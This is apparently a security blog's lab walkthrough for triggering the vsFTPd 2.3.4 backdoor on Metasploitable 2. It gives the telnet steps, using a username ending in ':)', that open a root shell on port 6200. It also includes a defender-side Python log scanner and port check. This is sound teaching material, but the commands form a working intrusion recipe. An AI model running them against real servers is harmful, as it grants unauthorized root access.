I assume from the previous article that you did some research on the vulnerable FTP service (vsFTPd 2.3.4).
A quick intro to what an exploit is:
An exploit is a piece of code that takes advantage of a security gap in an application's code. In the case of vsFTPd 2.3.4, an intruder modified the original vsFTPd 2.3.4 source code so that it opens a backdoor if the username entered ends with the characters “:)”. The backdoored version will open a listening connection on port 6200.
Let's check it out for ourselves.
Fire up your Kali and Metasploitable 2.
We will skip the host discovery part, as we have covered it before and want to avoid repetition. You can find it here.
Check the status of port 6200
Enter the command: nmap -p 6200 <<target IP address>>
The “-p” flag tells nmap to scan only port 6200 on the given target IP address.
The results show that the port is closed and there is no service running on it.
Activating the backdoored vsFTPd 2.3.4
Enter the command: telnet <<target IP address>> 21
Note that “21” in the above command refers to the port number the FTP service is running on. After the command is executed, you are prompted to enter a username and password to access the system.
You can type anything as the username as long as it ends with the two characters “:)”, and you will activate the backdoor.
Check the current status of port 6200
Let's now check the current status of port 6200 again with the command: nmap -p 6200 <<target IP address>>
Voila! The port is now open.
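From the defender's side, the two facts above (a username ending in “:)” arms the backdoor, and the backdoor listens on TCP 6200) are enough to build simple detection. The script below is an added example, not code from the original post or from the vsftpd project: it scans FTP log lines for login attempts whose username ends in “:)”, and checks whether a host has something listening on port 6200. The log line format is a constructed approximation of vsftpd's login entries and the sample lines are invented; treat both as assumptions and adapt the regex to the real log format on your own server.

```python
"""Defender-side checks for the vsFTPd 2.3.4 backdoor.

Added example (not from the original post). The log format below is a
constructed approximation of vsftpd's login log lines; sample data is invented.
"""
import re
import socket
from typing import Iterable, List, NamedTuple

BACKDOOR_PORT = 6200      # listener the backdoored build opens (from the post)
TRIGGER_SUFFIX = ":)"     # username suffix that arms the backdoor (from the post)


class Alert(NamedTuple):
    client: str
    username: str
    line: str


# Assumed log line shape, e.g.:
#   Thu Mar  7 10:02:11 2024 [pid 2311] [ftpuser:)] FAIL LOGIN: Client "192.0.2.10"
LOGIN_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?:OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)


def is_backdoor_trigger(username: str) -> bool:
    """True if the username carries the ':)' suffix that triggers the backdoor."""
    return username.endswith(TRIGGER_SUFFIX)


def scan_vsftpd_log(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per login line whose username would arm the backdoor."""
    alerts: List[Alert] = []
    for line in lines:
        m = LOGIN_RE.search(line)
        if m is None:          # CONNECT lines, transfers, etc. are ignored
            continue
        if is_backdoor_trigger(m.group("user")):
            alerts.append(Alert(m.group("client"), m.group("user"), line.rstrip()))
    return alerts


def is_port_listening(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a TCP connection to host:port succeeds.

    Run against your own FTP hosts to spot an unexpected 6200 listener; a
    refused or timed-out connection means nothing is listening.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Constructed sample log: one benign login, one backdoor trigger, one non-login line.
SAMPLE_LOG = [
    'Thu Mar  7 10:01:55 2024 [pid 2310] CONNECT: Client "192.0.2.10"',
    'Thu Mar  7 10:02:00 2024 [pid 2309] [anonymous] OK LOGIN: Client "198.51.100.7"',
    'Thu Mar  7 10:02:11 2024 [pid 2311] [ftpuser:)] FAIL LOGIN: Client "192.0.2.10"',
]

if __name__ == "__main__":
    for alert in scan_vsftpd_log(SAMPLE_LOG):
        print(f"BACKDOOR TRIGGER from {alert.client}: username={alert.username!r}")
    print("port 6200 listening on localhost:",
          is_port_listening("127.0.0.1", BACKDOOR_PORT))
```

Two caveats: the backdoor fires on the USER command, before any password is checked, so a log line recording the failed login is evidence after the fact rather than a block; and the port check only says whether something answers on 6200, not what it is. The actual fix is to replace the backdoored 2.3.4 build with a clean vsftpd package.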
Telnet into port 6200
Enter the command: telnet <<target IP address>> 6200
After the command executes, type “id” to see which user you are running as.
With root access you can cause a lot of havoc.
I will leave it up to you to research telnet commands and how to use them.
-Jayesh Kerai (@secjay)